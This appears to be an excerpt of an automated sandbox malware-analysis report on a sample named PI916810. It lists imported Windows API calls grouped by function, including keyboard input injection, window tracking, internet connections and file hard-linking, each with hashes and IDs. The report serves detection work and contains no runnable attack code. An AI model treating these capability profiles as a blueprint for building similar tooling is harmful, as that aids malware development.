• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004D6D58
• WSAGetLastError.WSOCK32(00000000), ref: 004D6D64
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,004EF910), ref: 004D67BA
• _strlen.LIBCMT ref: 004D67EC
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004CBB09
• GetLastError.KERNEL32(?,00000000), ref: 004CBB2F
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004CBB54
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004CBB80
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004E8B4D
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InvalidateRect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 634782764-0
                                                                                                                                                                            • Opcode ID: e99b7fcc0260ef5eeb062411f18c402438515b1e28000699f1461ec48acce4cd
                                                                                                                                                                            • Instruction ID: 1f42e8f98705d20297e9875efbb69da661eb6437d9a8b42f948f7bf949be5e6c
                                                                                                                                                                            • Opcode Fuzzy Hash: e99b7fcc0260ef5eeb062411f18c402438515b1e28000699f1461ec48acce4cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B310A74600284BFEF208F1ACC85FAA37A1FB05312F14461BF659D63E1CE38B9419749
APIs
• ClientToScreen.USER32(?,?), ref: 004EAE1A
• GetWindowRect.USER32(?,?), ref: 004EAE90
• PtInRect.USER32(?,?,004EC304), ref: 004EAEA0
• MessageBeep.USER32(00000000), ref: 004EAF11
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: e5ac47bd90ae9e95220745c4caef958cfca613dea17c632caea3e2112ceb75a5
• Instruction ID: f669673b17a4a6c56c8104ffd909d4e47cd4e7b63a194ffb46e63fe9c79c006a
• Opcode Fuzzy Hash: e5ac47bd90ae9e95220745c4caef958cfca613dea17c632caea3e2112ceb75a5
• Instruction Fuzzy Hash: 0941AE70600199DFCB21CF6AC884B6A7BF5FF59302F1881AAE8149B351C734B816DF96
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004C1037
• SetKeyboardState.USER32(00000080,?,00000001), ref: 004C1053
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 004C10B9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 004C110B
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 0f5f9e6cab7e3dac2ae8be210f6ac7e79167bccb0b2aefeb5750260bdbf446fc
• Instruction ID: 33fcef96461320ea546d85a703ac0baf2c4cd7bef051521d9f75a40e3d5cade3
• Opcode Fuzzy Hash: 0f5f9e6cab7e3dac2ae8be210f6ac7e79167bccb0b2aefeb5750260bdbf446fc
• Instruction Fuzzy Hash: 87311C34940688AAFB708A678C05FFAB7A5AB47310F04422FE541566E3C37D49C5975E
APIs
• GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 004C1176
• SetKeyboardState.USER32(00000080,?,00008000), ref: 004C1192
• PostMessageW.USER32(00000000,00000101,00000000), ref: 004C11F1
• SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 004C1243
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 043d19f70f97bd7bcd8c54115689acc430d2baf022aeadb9271c041412e347ad
• Instruction ID: 4ffe83c2f32101b934c0850a6cf001159818c31916e4f42c9aa2459a1916b6a0
• Opcode Fuzzy Hash: 043d19f70f97bd7bcd8c54115689acc430d2baf022aeadb9271c041412e347ad
• Instruction Fuzzy Hash: 81312B38940648AAEF748A658C08FFBBB69AB4A310F18435FE590922F3CB3C4955975D
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0049644B
• __isleadbyte_l.LIBCMT ref: 00496479
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004964A7
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004964DD
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: be5dd6e039b8f35b7d2ef6a229e616abcde0fec56d5dcdbb748a62dd3c419855
• Instruction ID: 44f2c8cbf8e1f4431426b04dd9764193d7e0d68c48283d0700e058b34e440841
• Opcode Fuzzy Hash: be5dd6e039b8f35b7d2ef6a229e616abcde0fec56d5dcdbb748a62dd3c419855
• Instruction Fuzzy Hash: 1A31B031600246AFDF218FB5CD45BAB7FA9FF41310F16443AE85487291E739E851DB98
APIs
• GetForegroundWindow.USER32 ref: 004E5189
  • Part of subcall function 004C387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004C3897
  • Part of subcall function 004C387D: GetCurrentThreadId.KERNEL32 ref: 004C389E
  • Part of subcall function 004C387D: AttachThreadInput.USER32(00000000,?,004C52A7), ref: 004C38A5
• GetCaretPos.USER32(?), ref: 004E519A
• ClientToScreen.USER32(00000000,?), ref: 004E51D5
• GetForegroundWindow.USER32 ref: 004E51DB
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f514d46ac01edcd7bb3dd99aca7bfbaddd5fb46a693da51c3ea2b9df4de6ee95
• Instruction ID: aa3d4a33eed3c0c641d2b25f08826d58d795d7334d1714be691f19e8adf44c73
• Opcode Fuzzy Hash: f514d46ac01edcd7bb3dd99aca7bfbaddd5fb46a693da51c3ea2b9df4de6ee95
• Instruction Fuzzy Hash: B9312E71900148AFDB04EFA6C8859EFB7FDEF98304F10406AE415E7241EA799E05CBA5
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
• GetCursorPos.USER32(?), ref: 004EC7C2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0049BBFB,?,?,?,?,?), ref: 004EC7D7
• GetCursorPos.USER32(?), ref: 004EC824
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0049BBFB,?,?,?), ref: 004EC85E
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864067406-0
                                                                                                                                                                            • Opcode ID: 494383591c4903c1ccade21bd8a6935359dfdd76a7675e931fd4b70fb37ca4c3
                                                                                                                                                                            • Instruction ID: 7740ab2292621e45dccf01df6c1ecba9dea32745cea69a0a2e75c984c5ab23e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 494383591c4903c1ccade21bd8a6935359dfdd76a7675e931fd4b70fb37ca4c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 01315E35600098AFCB259F59C8D8EAA7BB6FB49312F04406AF9058B262C7359952DB68
                                                                                                                                                                            APIs
                                                                                                                                                                            • __setmode.LIBCMT ref: 00480BF2
                                                                                                                                                                              • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004C7B20,?,?,00000000), ref: 00465B8C
                                                                                                                                                                              • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,004C7B20,?,?,00000000,?,?), ref: 00465BB0
                                                                                                                                                                            • _fprintf.LIBCMT ref: 00480C29
                                                                                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 004B6331
                                                                                                                                                                              • Part of subcall function 00484CDA: _flsall.LIBCMT ref: 00484CF3
                                                                                                                                                                            • __setmode.LIBCMT ref: 00480C5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 521402451-0
                                                                                                                                                                            • Opcode ID: 88a4119f63e6573005de3778d20e1263b8f9d7432d427ffab9fb160ca6948f7f
                                                                                                                                                                            • Instruction ID: 77172636968418767368bc6bd1aea6451ebe5fbcaf14c2206642c1a79e99c6f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 88a4119f63e6573005de3778d20e1263b8f9d7432d427ffab9fb160ca6948f7f
                                                                                                                                                                            • Instruction Fuzzy Hash: 151154729042086ACB08B7B69C42ABE7B689F81324F14051FF20457292EE3C1D4A83AE
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B8669
                                                                                                                                                                              • Part of subcall function 004B8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B8673
                                                                                                                                                                              • Part of subcall function 004B8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8682
                                                                                                                                                                              • Part of subcall function 004B8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8689
                                                                                                                                                                              • Part of subcall function 004B8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B869F
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004B8BEB
                                                                                                                                                                            • _memcmp.LIBCMT ref: 004B8C0E
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B8C44
                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004B8C4B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1592001646-0
                                                                                                                                                                            • Opcode ID: e34eea1f946425e1973da2d4d78e908a5a368371840bd5d3712c65421a26f7c1
                                                                                                                                                                            • Instruction ID: 0d4353ebc239fd040f6b226193035fe5210e83ed8be4cc4e35203a048ce96c6d
                                                                                                                                                                            • Opcode Fuzzy Hash: e34eea1f946425e1973da2d4d78e908a5a368371840bd5d3712c65421a26f7c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A216BB1E01209EBDB10DFA4C945BEEBBB8EF44354F14406AE554AB241DB35AE06CB64
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004D1A97
                                                                                                                                                                              • Part of subcall function 004D1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004D1B40
                                                                                                                                                                              • Part of subcall function 004D1B21: InternetCloseHandle.WININET(00000000), ref: 004D1BDD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1463438336-0
                                                                                                                                                                            • Opcode ID: 11675524aaa06b181925bcda8f7bc3ed3df84180016f4fffccef46f2dbc08705
                                                                                                                                                                            • Instruction ID: b4ef365ea3d8cd4c48cf0b90439f6c5ebcc8e145811b5051d2e903b1ff2f8755
                                                                                                                                                                            • Opcode Fuzzy Hash: 11675524aaa06b181925bcda8f7bc3ed3df84180016f4fffccef46f2dbc08705
                                                                                                                                                                            • Instruction Fuzzy Hash: 24219235200601BFDB119F608C21FBBB7A9FF94701F10402BF95196761E775A8159B98
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004BF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004BE1C4,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?), ref: 004BF5BC
                                                                                                                                                                              • Part of subcall function 004BF5AD: lstrcpyW.KERNEL32(00000000,?,?,004BE1C4,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BF5E2
                                                                                                                                                                              • Part of subcall function 004BF5AD: lstrcmpiW.KERNEL32(00000000,?,004BE1C4,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?), ref: 004BF613
                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BE1DD
                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BE203
                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BE237
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                            • Opcode ID: 6729733152ebe1d972d94848f15ca4b3e7e45b636dd60f531a3598d182b9c52f
                                                                                                                                                                            • Instruction ID: 1d4cd06d44d4d5394509fb5589eddcaab657f943e9d112671e2c320663d9bde7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6729733152ebe1d972d94848f15ca4b3e7e45b636dd60f531a3598d182b9c52f
                                                                                                                                                                            • Instruction Fuzzy Hash: DA11BE3A200345EFCB29AF65DC459BA77A8FF85310B40806BE906CB260EB75985587A9
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00495351
                                                                                                                                                                              • Part of subcall function 0048594C: __FF_MSGBANNER.LIBCMT ref: 00485963
                                                                                                                                                                              • Part of subcall function 0048594C: __NMSG_WRITE.LIBCMT ref: 0048596A
                                                                                                                                                                              • Part of subcall function 0048594C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000000,?,?,?,00481013,?), ref: 0048598F
                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 42a5fe947f4b67e1a8da4e857ad797e44d0b63412945275efdc057953a714c73
• Instruction ID: 08abee49b4e218a2bc340acb3a028f842ec4a1003cbe5b3e9d3ee8a5b48427eb
• Opcode Fuzzy Hash: 42a5fe947f4b67e1a8da4e857ad797e44d0b63412945275efdc057953a714c73
• Instruction Fuzzy Hash: 4211C132504A15AECF323F71A84566E3F989F103A4B30483FFD059A291DABD8941979C
APIs
• _memset.LIBCMT ref: 00464560
  • Part of subcall function 0046410D: _memset.LIBCMT ref: 0046418D
  • Part of subcall function 0046410D: _wcscpy.LIBCMT ref: 004641E1
  • Part of subcall function 0046410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004641F1
• KillTimer.USER32(?,00000001,?,?), ref: 004645B5
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004645C4
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0049D6CE
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 28c138619c14e5413f727c3b8a60af6c15cf66cea1350129b45c8b3213c19085
• Instruction ID: 55ee5c46b06adfd9a0a6034d84c90423d01dd5537dc88d2544732e9f58429385
• Opcode Fuzzy Hash: 28c138619c14e5413f727c3b8a60af6c15cf66cea1350129b45c8b3213c19085
• Instruction Fuzzy Hash: E821F870904384AFEF328B248C55BE7BFEC9F51308F0000AFE69E56241D7781E898B5A
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004C40D1
• _memset.LIBCMT ref: 004C40F2
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004C4144
• CloseHandle.KERNEL32(00000000), ref: 004C414D
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: 2b7b32727a8fc1f5070540506cfbba78585c7c42ff7e373c2bcff8f0935f7b83
• Instruction ID: 2c6b54855db6ab0e813f9f0dac7129c4251b3ef9c5319ec26a257ad64ac6e052
• Opcode Fuzzy Hash: 2b7b32727a8fc1f5070540506cfbba78585c7c42ff7e373c2bcff8f0935f7b83
• Instruction Fuzzy Hash: 6C11EB75D012287AD7309BA59C4DFABBB7CEF84760F1041AAF908D7180D6744E848BA8
APIs
  • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004C7B20,?,?,00000000), ref: 00465B8C
  • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,004C7B20,?,?,00000000,?,?), ref: 00465BB0
• gethostbyname.WSOCK32(?), ref: 004D66AC
• WSAGetLastError.WSOCK32(00000000), ref: 004D66B7
• _memmove.LIBCMT ref: 004D66E4
• inet_ntoa.WSOCK32(?), ref: 004D66EF
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 8ea32861b9a95f4b4d851b07f3bc7052717ff1cf3d9d5a64c84a4e24a62f009b
• Instruction ID: 82f7b530fbe10d13191fcf0cd1c7ca9084b34c26ad2d1c3b125351e12805d869
• Opcode Fuzzy Hash: 8ea32861b9a95f4b4d851b07f3bc7052717ff1cf3d9d5a64c84a4e24a62f009b
• Instruction Fuzzy Hash: 5B114F75500508ABCB00FBA5DD96DEE77B8BF04314B14416FF502A7262EB34AE04CB6A
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004B9043
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B9055
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B906B
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B9086
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
